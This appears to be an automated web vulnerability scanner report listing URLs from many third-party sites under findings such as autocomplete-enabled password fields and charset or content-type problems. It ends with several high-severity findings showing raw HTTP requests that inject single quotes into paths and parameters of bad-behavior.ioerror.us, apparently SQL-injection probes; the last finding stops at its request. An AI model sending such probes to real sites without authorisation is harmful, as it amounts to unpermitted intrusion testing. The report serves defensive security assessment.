7.607. http://www.virtusa.com/ftbu/services/technology/industries/sap-ps-cd.asp
7.608. http://www.virtusa.com/ftbu/services/technology/industries/sap-trm.asp
7.609. http://www.virtusa.com/ftbu/services/technology/insurance/default.asp
7.610. http://www.virtusa.com/ftbu/services/technology/insurance/sap-alice.asp
7.611. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-cd.asp
7.612. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-cm.asp
7.613. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-icm.asp
7.614. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-pm.asp
7.615. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-ri.asp
7.616. http://www.virtusa.com/ftbu/services/technology/integration-sap-non-sap.asp
7.617. http://www.virtusa.com/ftbu/services/technology/maintenance.asp
7.618. http://www.virtusa.com/ftbu/services/technology/system-migration.asp
7.619. http://www.virtusa.com/ftbu/services/technology/upgrades.asp
7.620. http://www.virtusa.com/ftbu/sitemap.asp
7.621. http://www.virtusa.com/ftbu/terms-conditions.asp
7.622. http://www.virtusa.com/industries/banking-financial-services/
7.623. http://www.virtusa.com/industries/communications/
7.624. http://www.virtusa.com/industries/high-technology/
7.625. http://www.virtusa.com/industries/independent-software-vendors/
7.626. http://www.virtusa.com/industries/insurance/
7.627. http://www.virtusa.com/industries/media-information-entertainment/
7.628. http://www.virtusa.com/industries/pharmaceuticals/
7.629. http://www.virtusa.com/investors/SEC_filings.asp
7.630. http://www.virtusa.com/investors/annual_report_and_proxy_statement.asp
7.631. http://www.virtusa.com/investors/corporate_governance.asp
7.632. http://www.virtusa.com/investors/default.asp
7.633. http://www.virtusa.com/investors/investor_contact.asp
7.634. http://www.virtusa.com/investors/stock_information.asp
7.635. http://www.virtusa.com/newsroom/article.asp
7.636. http://www.virtusa.com/newsroom/default.asp
7.637. http://www.virtusa.com/newsroom/events.asp
7.638. http://www.virtusa.com/newsroom/in-the-media.asp
7.639. http://www.virtusa.com/newsroom/press-releases.asp
7.640. http://www.virtusa.com/platforming/overview.asp
7.641. http://www.virtusa.com/platforming/platforming-best-practices.asp
7.642. http://www.virtusa.com/platforming/why-platforming.asp
7.643. http://www.virtusa.com/practices/bpm/
7.644. http://www.virtusa.com/practices/bpm/default.asp
7.645. http://www.virtusa.com/practices/dwbi/
7.646. http://www.virtusa.com/practices/dwbi/center-of-excellence/default.asp
7.647. http://www.virtusa.com/practices/dwbi/default.asp
7.648. http://www.virtusa.com/practices/dwbi/service-offerings/default.asp
7.649. http://www.virtusa.com/practices/dwbi/technology-and-alliances/default.asp
7.650. http://www.virtusa.com/practices/ecm/
7.651. http://www.virtusa.com/practices/ecm/default.asp
7.652. http://www.virtusa.com/practices/software-testing/
7.653. http://www.virtusa.com/practices/software-testing/core-testing/default.asp
7.654. http://www.virtusa.com/practices/software-testing/default.asp
7.655. http://www.virtusa.com/practices/software-testing/test-consultancy/default.asp
7.656. http://www.virtusa.com/practices/software-testing/tools-expertise.asp
7.657. http://www.virtusa.com/privacy-statement.asp
7.658. http://www.virtusa.com/resources/agile-software-development.asp
7.659. http://www.virtusa.com/resources/application-consolidation.asp
7.660. http://www.virtusa.com/resources/application-development-services.asp
7.661. http://www.virtusa.com/resources/application-rationalization.asp
7.662. http://www.virtusa.com/resources/automated-software-test.asp
7.663. http://www.virtusa.com/resources/business-technology-services.asp
7.664. http://www.virtusa.com/resources/custom-software-development.asp
7.665. http://www.virtusa.com/resources/development-outsourcing.asp
7.666. http://www.virtusa.com/resources/it-application-maintenance.asp
7.667. http://www.virtusa.com/resources/it-consolidation.asp
7.668. http://www.virtusa.com/resources/it-consulting-company.asp
7.669. http://www.virtusa.com/resources/it-consulting-outsourcing.asp
7.670. http://www.virtusa.com/resources/it-consulting-services.asp
7.671. http://www.virtusa.com/resources/it-offshoring.asp
7.672. http://www.virtusa.com/resources/lean-it.asp
7.673. http://www.virtusa.com/resources/offshore-development.asp
7.674. http://www.virtusa.com/resources/offshore-outsourcing-services.asp
7.675. http://www.virtusa.com/resources/outsource-software-development.asp
7.676. http://www.virtusa.com/resources/outsourcing-services.asp
7.677. http://www.virtusa.com/resources/performance-testing-tools.asp
7.678. http://www.virtusa.com/resources/software-development-company.asp
7.679. http://www.virtusa.com/resources/software-outsourcing-company.asp
7.680. http://www.virtusa.com/resources/software-test-automation.asp
7.681. http://www.virtusa.com/resources/software-test-management.asp
7.682. http://www.virtusa.com/resources/technology-outsourcing.asp
7.683. http://www.virtusa.com/rssfeeds/default.asp
7.684. http://www.virtusa.com/search/result.asp
7.685. http://www.virtusa.com/services/application-development/
7.686. http://www.virtusa.com/services/consulting/
7.687. http://www.virtusa.com/services/legacy-asset-management/
7.688. http://www.virtusa.com/services/product-development/
7.689. http://www.virtusa.com/sitemap.asp
7.690. http://www.virtusa.com/terms-conditions.asp
8. Password field with autocomplete enabled
8.1. https://accounts.zoho.com/login
8.2. https://accounts.zoho.com/register
8.3. http://bad-behavior.ioerror.us/wp-login.php
8.5. http://bnxs.com/how-to-start-your-own-url-shortening-service/
8.6. http://bnxs.com/wp-includes/js/tinymce/plugins/wordpress/wordpress.css
8.8. https://client.trafficshaping.com/signin
8.9. http://dev.qwerly.com/member/register
8.10. http://forums.winamp.com/
8.11. http://forums.winamp.com/forumdisplay.php
8.12. http://forums.winamp.com/login.php
8.14. http://lilypad.cranberry.com/person/new
8.15. http://lilypad.cranberry.com/person/new
8.16. https://login.silverlight.net/login/signin.aspx
8.17. http://mail.ioerror.us/mailman/listinfo/bad-behavior
8.18. http://mail.ioerror.us/mailman/listinfo/bad-behavior
8.19. http://mail.ioerror.us/mailman/listinfo/bad-behavior-announce
8.20. http://mail.ioerror.us/mailman/listinfo/bad-behavior-announce
8.21. https://shop.winamp.com/store
8.22. http://telligent.com/login.aspx
8.23. http://telligent.com/login.aspx
8.24. http://trafficshaping.com/
8.25. https://twitter.com/oauth/authenticate
8.26. http://www.capgemini.com/registration/register/
8.27. https://www.fusionbot.com/login.asp
8.28. http://www.project-syndicate.org/
8.29. http://www.project-syndicate.org/commentary/ashour1/English
8.30. http://www.project-syndicate.org/commentary/ashour1/English
8.31. http://www.project-syndicate.org/commentary/fischer60/English
8.32. http://www.project-syndicate.org/commentary/fischer60/English
8.33. http://www.project-syndicate.org/contributor/1608
8.34. http://www.project-syndicate.org/contributor/886
8.35. http://www.project-syndicate.org/register
8.36. http://www.project-syndicate.org/register
8.37. http://www.project-syndicate.org/series/finance_in_the_21st_century/description
8.38. http://www.project-syndicate.org/series_metacategory/1
8.39. http://www.project-syndicate.org/series_metacategory/3
8.40. http://www.sitelevel.com/
8.41. http://www.watchmouse.com/en/
8.42. http://www.watchmouse.com/en/
8.43. http://www.watchmouse.com/en/contact.php
8.44. http://www.watchmouse.com/en/plans_price.php
9.1. http://usage.apps.conduit-services.com/Default.aspx
9.2. http://www.leadlife.com/Default.aspx
9.3. http://www.sti-world.com/Default.aspx
10.1. http://jigsaw.w3.org/css-validator/
10.2. http://sstatic.net/Js/wmd.js
11.1. http://adam.companypond.com/
11.5. http://capgeminicom.112.2o7.net/
11.6. http://capgeminicomglobal.112.2o7.net/
11.7. https://client.trafficshaping.com/
11.9. http://creativecommons.org/
11.10. http://forums.winamp.com/
11.11. http://image2.pubmatic.com/
11.13. http://lilypad-cdn.cranberry.com/
11.14. http://lilypad.cranberry.com/
11.15. https://login.oracle.com/
11.16. http://mail.ioerror.us/
11.17. https://mix.oracle.com/
11.18. http://networksolutions.112.2o7.net/
11.21. http://referrals.fusionbot.com/
11.23. http://statistics.wibiya.com/
11.24. http://tacoda.at.atwola.com/
11.26. http://widgets.digg.com/
11.27. http://wstat.wibiya.com/
11.28. http://www.companypond.com/
11.29. http://www.cranberryventurepartners.com/
11.30. http://www.fusionbot.com/
11.31. https://www.fusionbot.com/
11.32. http://www.opengroup.org/
11.33. http://www.sti-seoservices.com/
12.1. http://ads.undertone.com/afr.php
12.2. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0
12.3. http://api.qwerly.com/v1/facebook/username/someone
12.4. http://api.search.live.net/json.aspx
12.5. http://ar.atwola.com/atd
12.6. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125
12.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs
12.9. http://capgeminicom.112.2o7.net/crossdomain.xml
12.11. http://cdn.cloudscan.us/
12.14. http://cm.g.doubleclick.net/pixel
12.15. http://code.google.com/p/swfobject/
12.16. http://creativecommons.org/licenses/by-sa/2.5/
12.17. http://cspix.media6degrees.com/orbserv/hbpix
12.19. http://developer.klout.com/
12.20. http://discuss.zoho.com/getCustomFile.do
12.21. http://drh.img.digitalriver.com/store
12.22. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_4_5_18/StdBanner.js
12.23. http://duck.co/jsp/i18nConstants.jsp
12.24. https://duckduckgo.com/e.js
12.25. http://edge.quantserve.com/quant.js
12.26. https://event.on24.com/eventRegistration/EventLobbyServlet
12.27. http://forums.winamp.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js
12.28. http://go.microsoft.com/fwlink/
12.29. http://i2.duck.co/i/sports.espn.go.com.ico
12.30. http://jigsaw.w3.org/css-validator/
12.32. http://linkhelp.clients.google.com/tbproxy/lh/fixurl
12.33. http://loadm.exelator.com/load/
12.34. https://login.live.com/pp1000/CSS/WEBwhitegray1033.css
12.35. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur
12.36. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s19329686376731
12.37. http://now.eloqua.com/visitor/v200/svrGP.aspx
12.38. http://o.sa.aol.com/b/ss/aoltechcrunch,aolsvc/1/H.21/s68993670598138
12.40. http://s.gravatar.com/js/gprofiles.js
12.41. http://s0.wp.com/wp-content/themes/h4/global.css
12.42. http://s1.wp.com/wp-includes/js/jquery/jquery.js
12.43. http://s2.wp.com/wp-content/themes/vip/tctechcrunch/style.css
12.44. http://s7.addthis.com/js/250/addthis_widget.js
12.46. http://safebrowsing.clients.google.com/safebrowsing/downloads
12.47. http://services.winamp.com/ivw/get
12.48. http://shop.winamp.com/store
12.49. https://shop.winamp.com/store
12.50. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/lqIx_MUkbGi.css
12.51. http://static02.linkedin.com/scds/common/u/img/sprite/sprite_connect_v6.png
12.52. http://statistics.wibiya.com/SetToolbarLoad.php
12.53. http://tags.crwdcntrl.net/5/c=25/b=1225400
12.55. http://telligent.com/products/telligent_community/
12.56. http://tetlaw.id.au/view/blog/prototype-class-fastinit/
12.57. http://tools.google.com/service/update2
12.58. http://translate.googleapis.com/translate_a/l
12.59. https://twitter.com/oauth/authenticate
12.60. http://widgets.digg.com/buttons/count
12.61. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
12.62. http://www.atlanticyachtandship.com/about_us.html
12.63. http://www.capgemini.com/
12.64. http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf
12.65. http://www.freefind.com/
12.66. http://www.fusionbot.com/
12.67. https://www.fusionbot.com/login.asp
12.68. http://www.homelandstupidity.us/
12.69. http://www.kingdee.com/en/
12.70. http://www.leadlife.com/analytics/lla.aspx
12.71. http://www.opengroup.org/togaf/
12.72. http://www.sti-seoservices.com/
12.73. http://www.sti-world.com/
12.74. http://www.stisoftware.net/
12.75. http://www.winamp.com/media-player/en
12.76. http://www.wolframalpha.com/input/
12.77. http://www.zoho.com/company.html
12.78. http://www1.wolframalpha.com/Calculate/MSP/MSP108819ecf93a845dci5i000032708gihb0c32g77
12.79. http://www4d.wolframalpha.com/Calculate/MSP/MSP485119ecg7ic1a16ifci00004c77aigbe60ad8d6
13.1. https://accounts.zoho.com/login
13.2. https://accounts.zoho.com/register
13.4. https://duckduckgo.com/Electronic_Frontier_Foundation
13.5. https://duckduckgo.com/HTTP_Secure
13.6. https://duckduckgo.com/HTTP_cookie
13.7. https://duckduckgo.com/IP_Address
13.8. https://duckduckgo.com/about.html
13.9. https://duckduckgo.com/bang.html
13.10. https://duckduckgo.com/e.js
13.11. https://duckduckgo.com/faq.html
13.12. https://duckduckgo.com/feedback.html
13.13. https://duckduckgo.com/goodies.html
13.14. https://duckduckgo.com/html
13.15. https://duckduckgo.com/html/
13.16. https://duckduckgo.com/lite
13.17. https://duckduckgo.com/opensearch.xml
13.18. https://duckduckgo.com/params.html
13.19. https://duckduckgo.com/privacy.html
13.20. https://duckduckgo.com/settings.html
13.21. https://event.on24.com/eventRegistration/EventLobbyServlet
13.22. https://login.live.com/pp1000/RDHelper_JS.srf
13.23. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
13.24. https://login.oracle.com/sso_loginui/oracle.css
13.25. https://login.silverlight.net/
13.26. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx
13.27. https://myprofile.oracle.com/EndUser/faces/profile/resetPassword.jspx
13.28. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
13.29. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
13.30. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
13.31. https://profile.microsoft.com/RegSysProfileCenter/history.html
13.32. https://profile.microsoft.com/regsysprofilecenter/Footer.aspx
13.33. https://profile.microsoft.com/regsysprofilecenter/rps/LeftFrame.aspx
14. Multiple content types specified
14.1. http://bnxs.com/wp-includes/js/tinymce/tiny_mce.js
14.2. http://companypond.com/js/tiny_mce/tiny_mce.js
14.3. http://lilypad.cranberry.com/js/tiny_mce/tiny_mce.js
14.4. http://peoplepond.com/js/tiny_mce/tiny_mce.js
14.5. http://www.companypond.com/js/tiny_mce/tiny_mce.js
14.6. http://www.project-syndicate.org/javascript/tiny_mce/tiny_mce_gzip.php
15. HTML does not specify charset
15.1. http://ad.doubleclick.net/adi/N1260.gawkernetwork/B5173555.12
15.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45
15.3. http://adam.companypond.com/peeps.php
15.4. http://alexgorbatchev.com/SyntaxHighlighter/donate.html
15.5. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0
15.6. http://api.qwerly.com/favicon.ico
15.8. http://bassett.in/favicon.ico
15.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs
15.11. http://capgeminicom.112.2o7.net/crossdomain.xml
15.12. http://cdn.at.atwola.com/_media/uac/tcode3.html
15.13. http://cdn.cloudscan.us/examples/plesk-reports/plesk-target.html
15.14. http://cloudscan.us/images/plesk-cover-1.jpg
15.15. http://dakwak.com/socket.html
15.16. http://dev.qwerly.com/favicon.ico
15.17. http://developer.klout.com/favicon.ico
15.19. http://duckduckgo.com/asciitable.html
15.20. http://duckduckgo.com/leaderboard.html
15.21. http://duckduckgo.com/post.html
15.22. http://duckduckgo.com/privacy.html
15.23. http://duckduckgo.com/search.html
15.24. http://duckduckgo.com/terms.html
15.25. http://duckduckgo.com/traffic.html
15.26. https://duckduckgo.com/privacy.html
15.27. http://eventreg.oracle.com/
15.28. http://fls.doubleclick.net/activityi
15.30. http://ioerror.us/bb2-support-key
15.31. http://js.bizographics.com/support/partner.html
15.32. http://load.exelator.com/load/net.php
15.33. http://mediacdn.disqus.com/1298421702/build/system/def.html
15.34. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
15.35. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
15.36. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
15.37. http://now.eloqua.com/visitor/v200/svrGP.aspx
15.38. http://odb.outbrain.com/utils/ping.html
15.39. http://products.wolframalpha.com/api/
15.40. https://profile.microsoft.com/RegSysProfileCenter/history.html
15.41. http://seg.sharethis.com/getSegment.php
15.42. http://statistics.wibiya.com/SetToolbarLoad.php
15.43. http://tags.bluekai.com/site/918
15.45. http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
15.47. http://REDACTED/CNT/iview/302784236/direct
15.48. http://REDACTED/iaction/00asup_HomePortal_1
15.49. http://REDACTED/iaction/adoapn_AppNexusDemoActionTag_1
15.50. http://wd.sharethis.com/api/getCount.php
15.51. http://widgets.fbshare.me/files/fbshare.php
15.52. http://www.bloganol.com/wp-content/plugins/disqus-comment-system/xd_receiver.htm
15.53. http://www.cranberryventurepartners.com/
15.54. http://www.cranberryventurepartners.com/about-us.php
15.55. http://www.freefind.com/favicon.ico
15.56. http://www.fusionbot.com/
15.57. https://www.fusionbot.com/login.asp
15.58. http://www.google.com/enterprise/search/gsa.html
15.59. http://www.google.com/enterprise/search/gsa_website.html
15.60. http://www.montrealkiosk.com/directory.php
15.61. http://www.networksolutions.com/jsonBrowserInfo.do
15.62. http://www.networksolutions.com/jsonLogRedVenturesId.do
15.63. http://www.opengroup.org/architecture/togaf8-doc/arch/
15.64. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html
15.65. http://www.oracle.com/go/index.html
15.66. http://www.sti-cs.com/CompanyProfile/include/img/spacer.gif
15.67. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24'/page-1/include/img/spacer.gif
15.68. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/include/img/spacer.gif
15.71. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/include/img/spacer.gif
15.72. http://www.sti-cs.com/favicon.ico
15.73. http://www.sti-cs.com/links/
15.74. http://www.sti-cs.com/rfq/
15.75. http://www.thedetroitbureau.com/
15.76. http://www.thedetroitbureau.com/2011/02/insurer-wants-fbi-to-pay-750000-for-crashed-ferrari/
15.77. http://www.thedetroitbureau.com/contact-us/
15.78. http://www.virtusa.com/alumni/
15.79. http://www.virtusa.com/careers/our-values.asp/
15.80. http://www.virtusa.com/careers/work-environment.asp/
15.81. http://www.virtusa.com/common/exitpage.asp
15.82. http://www.virtusa.com/contactus/sendmail.asp
15.83. http://www.virtusa.com/ftbu/images/favicon.ico
15.84. http://www.virtusa.com/ftbu/scripts/topnav/style.css
15.85. http://www.virtusa.com/practices/software-testing/tools-expertise.asp/
15.86. http://www.virtusa.com/sustainability/
15.87. http://www.wolframalpha.com/
15.88. http://xss.cx//examples/plesk-reports/plesk-xss.html
15.89. http://xss.cx/examples/html/xss-cross-site-scripting.boardreader.com.html
15.90. http://xss.cx/examples/plesk-reports/plesk-10.2.0.html
15.91. http://xss.cx/examples/plesk-reports/plesk-xss.html
15.92. http://xss.cx/hoyt-llc-research-vulnerability-advisories.html
16. HTML uses unrecognised charset
17. Content type incorrectly stated
17.1. http://a1.twimg.com/profile_images/657503744/twitterProfilePhoto_normal.jpg
17.2. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0
17.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs
17.4. http://capgeminicom.112.2o7.net/crossdomain.xml
17.5. http://cdn.cloudscan.us/examples/exploits/watchmouse.txt
17.6. http://cloudscan.us/images/plesk-cover-1.jpg
17.7. http://corp.tap11.com/wp-content/themes/tap11/Geogtq-Rg.otf
17.8. http://cotweet.com/favicon.ico
17.9. http://dev.qwerly.com/favicon.ico
17.10. http://developer.klout.com/favicon.ico
17.11. http://discuss.zoho.com/getCustomFile.do
17.12. http://drh.img.digitalriver.com/DRHM/Storefront/Site/winamp/cm/images/favicon.ico
17.13. http://duck.co/jsp/i18nConstants.jsp
17.14. http://duckduckgo.com/iyp/6172532871
17.15. http://eventreg.oracle.com/favicon.ico
17.16. http://eventreg.oracle.com/webapps/events/ns/css/ers.css
17.17. http://ilove.klout.com/lkck.js
17.18. http://img.tweetimag.es/i/secsci_n
17.19. http://klout.com/public/images/partners.gif
17.20. http://landingpad.oracle.com/favicon.ico
17.21. http://lilypad-cdn.cranberry.com/img/fav/
17.22. http://liveintent.com/favicon.ico
17.23. https://login.live.com/pp1000/RDHelper_JS.srf
17.24. https://login.oracle.com/sso_loginui/oracle.css
17.25. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
17.26. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
17.27. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur
17.28. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur
17.29. http://mediacdn.disqus.com/1298421702/fonts/disqus-webfont.woff
17.30. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
17.31. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
17.32. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
17.33. http://now.eloqua.com/visitor/v200/svrGP.aspx
17.34. http://o.aolcdn.com/favicon.ico
17.36. http://photos4.meetupstatic.com/photos/event/b/6/d/highres_21062925.jpeg
17.37. http://rapportive.com/fonts/aller-lt-webfont.woff
17.38. http://rt.disqus.com/forums/realtime-cached.js
17.39. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif
17.40. http://s3.amazonaws.com/getsatisfaction.com/javascripts/feedback-v2.js
17.41. http://s3.buysellads.com/1236348/32247-1280107285.gif
17.42. http://s3.buysellads.com/1236348/48698-1295754678.gif
17.43. http://s4.histats.com/stats/1257017.php
17.44. http://s4.histats.com/stats/e.php
17.45. http://server.iad.liveperson.net/hcp/html/mTag.js
17.46. http://shop.winamp.com/DRHM/store
17.47. http://static.fmpub.net/zone/1535
17.48. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good/record/view
17.49. http://syndication.jobthread.com/jt/syndication/page.php
17.51. http://track2.mybloglog.com/js/jsserv.php
17.52. http://track2.mybloglog.com/tr/urltrk.php
17.53. http://twitter.com/favorites/tap11.json
17.54. http://wd.sharethis.com/api/getCount.php
17.55. http://widgets.dzone.com/links/dwr/interface/LinkManager.js
17.56. http://www.adexchanger.com/favicon.ico
17.57. http://www.adexchanger.com/wp-admin/admin-ajax.php
17.58. http://www.atlanticyachtandship.com/favicon.ico
17.59. http://www.bloganol.com/wp-admin/admin-ajax.php
17.60. http://www.capgemini.com/img/skin/flag_2.png
17.61. http://www.facebook.com/extern/login_status.php
17.62. http://www.google.com/buzz/api/button.js
17.63. http://www.google.com/recaptcha/api/reload
17.64. http://www.google.com/search
17.65. http://www.kingdee.com/en/js/index/v2008/Index.js
17.66. http://www.montrealkiosk.com/directory.php
17.67. http://www.networksolutions.com/jsonBrowserInfo.do
17.68. http://www.networksolutions.com/jsonLogRedVenturesId.do
17.69. http://www.paperthin.com/dhtmlmenu_pgdefs_2.js
17.70. http://www.paperthin.com/dhtmlmenu_staticmenus_2.js
17.71. http://www.paperthin.com/products/dhtmlmenu_pgdefs_2.js
17.72. http://www.paperthin.com/products/dhtmlmenu_staticmenus_2.js
17.73. http://www.paperthin.com/solutions/dhtmlmenu_pgdefs_2.js
17.74. http://www.paperthin.com/solutions/dhtmlmenu_staticmenus_2.js
17.75. http://www.stumbleupon.com/hostedbadge.php
17.76. http://www.winamp.com/modules/getTweets.jsp
17.77. http://www4d.wolframalpha.com/input/recalculate.jsp
17.78. http://xss.cx/spark.css
18. Content type is not specified
18.1. https://accounts.zoho.com/favicon.ico
18.2. http://charts.aastocks.com/servlet/Charts
18.3. http://init.zopim.com/register
18.4. http://lc03.zopim.com/poll
18.5. http://lc03.zopim.com/send
18.6. http://lfov.net/favicon.ico
18.7. http://lfov.net/webrecorder/g/chimera.js
18.8. http://lfov.net/webrecorder/js/listen.js
18.9. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
18.10. http://tap11.com/css/Geogtq-Rg.otf
18.11. http://www.kingdee.com/favicon.ico
| Severity: | High |
| Confidence: | Firm |
| Host: | http://bad-behavior |
| Path: | /2011/01/05/bad-behavior |
| GET /2011'/01/05/bad-behavior-2-1-8 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
| HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761999 Vary: Cookie X-Pingback: http://bad-behavior Link: <http://bad-behavior Content-Length: 26787 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://bad-behavior |
| Path: | /2011/01/05/bad-behavior |
| GET /2011/01'/05/bad-behavior-2-1-8/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
| HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762005 Vary: Cookie X-Pingback: http://bad-behavior Link: <http://bad-behavior Content-Length: 26787 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://bad-behavior |
| Path: | /2011/01/05/bad-behavior |
| GET /2011/01/05'/bad-behavior-2-1-8/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
| HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762011 Vary: Cookie X-Pingback: http://bad-behavior Link: <http://bad-behavior Content-Length: 26788 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://bad-behavior |
| Path: | /blog/ |
| GET /blog'/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
| HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:12:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761978 Vary: Cookie X-Pingback: http://bad-behavior Content-Length: 72723 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://bad-behavior |
| Path: | /category/bad-behavior/ |
| GET /category/bad-behavior'/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
| HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:14:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762060 Vary: Cookie X-Pingback: http://bad-behavior Content-Length: 51665 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://bad-behavior |
| Path: | /category/bad-behavior/ |
| GET /category/bad-behavior/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
